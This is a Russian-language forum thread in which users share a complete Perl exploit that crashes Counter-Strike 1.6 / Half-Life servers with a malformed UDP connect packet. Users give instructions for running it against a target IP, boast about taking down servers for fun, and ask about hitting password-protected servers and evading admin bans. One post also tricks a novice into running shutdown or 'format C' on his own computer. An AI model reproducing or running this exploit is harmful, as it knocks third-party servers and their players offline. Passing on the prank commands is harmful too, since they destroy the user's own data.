нашел рульный сплот убивающий серваки CS: #!/usr/bin/perl # Half-Life engine remote DoS exploit # bug found by Firestorm # tested against cstrike 1.6 Windows build-in server, cstrike 1.6 linux # dedicated server use IO::Socket; die "usage: ./csdos <host>" unless $ARGV[0]; $host=$ARGV[0]; if (fork()) { econnect($host); } else { econnect($host); }; exit; sub econnect($) { my $host=$_[0]; my $sock = new IO::Socket::INET(PeerAddr=>$host,PeerPort=>'27015',Proto=>'udp'); die "Could not create socket: $!\n" unless $sock; $cmd="\xff\xff\xff\xff"; syswrite $sock, $cmd."getchallenge"; sysread $sock,$b,65535; print $b,"\n"; @c=split(/ /,$b); $c2=$c[1]; $q=$cmd."connect 47 $c2 \"\\prot\\4\\unique\\0\\raw\\valve\\cdkey\\f0ef8a36258af1bb64ed866538c9db76\"\"\\\"\0\0"; print '>',$q,"\n"; syswrite $sock, $q; sysread $sock,$b,65535; print $b,"\n"; sleep 3; close $sock; } все пашет....но запероленный сервак..не берет..вылетает : $BADPASSWORD $BADPASSWORD у кого какие соображения будут ?
у меня никаких, ну впринципе если ты напишешь брут к серву, потом пробрутишь валидный пароль, потом составишь эксплойт, так чтоб он передавал пароль, то может и зачёт сдаш
Сам тащусь..... но все таки ! как можно реализовать...подвес запорленных серваков? и еще допустим я добыл пароль , куда его можно прописать.
Вощем смари сюда ! Нажимаеш Пуск-Выполнить- Shutdown -t 00 вроде так если не поможет то вот так format C там вощем окошко появится в которое эту шнягу вбить надо и нажать CTRL+ENTER ! Спрашиваеш почему все так сложно ? а потому что мы же хакеры и способы у нас должны быть хакерские так что давай жги сервы !
пользоваться им очень просто....качаешь Active Perl ( около 12 метров на гугле найдешь ) жмешь выполнить и набираешь : c:\Perl/bin/perl.exe c:\exploit\cs16.pl xxx.xxx.xxx.xxx где x IP адрес триклятого сервера CS
Там был вопрос где ты его достал? я не он но скажу что где угодно =) я этот сплойт увидел еще месяцев 6 назад и вообще и считаю что такие вещи должны быть приватными , ибо всякие ....... кхм нехорошие люди вешают сервы дайте вы поиграть то нормально и скажите зачем вам это надо ? ( я не в счёт =)) я рубил рублю и буду рубить сервы а почему ? потому-что прикольно )
Haz3r, уже неважно 4то сабж давно паблик, т.к. на 28 пат4е по слухам (т.к. сам не дока4ал =) уже уязвимости нет
кстати кто знает где достать AntiBAn для CS 1.6 ну чтоб админы не баннили и не выкидывали с сервера? я чувака на серваке видел он специально просил админов его забанить а те парились и не чё не смогли сделать так от так стебался на серваке...
2kipfun: пишу как ты и сказал "c:\Perl/bin/perl.exe c:\exploit\cs16.pl xxx.xxx.xxx.xxx" пишит мне **** A00000000 1617623932 2 >****connect 47 1617623932 "\prot\4\unique\0\raw\valve\cdkey\f0ef8a362 58af1bb64 ed866538c9db76""\" ****9Invalid hashed CD key. Можети обьснить мне что это такое?
обижашь в своей локалке житья никому не даю...... рубит все серваки на повал! и хл и кс 1.6, тока под паролем не берет..... а так все на ура..! у тебя может не идти потому что может патч послдений поставили, в них этот баг исправили.....не заню в нет это актуально будет еще не много....а в локалках еще долго...
Я открываю перл делаю как ва написали,мне пишет: <Do you need to predeclare pl?> А этот сплоит куда пихать надо? как можно бан в кс снять? Подскажите чтото*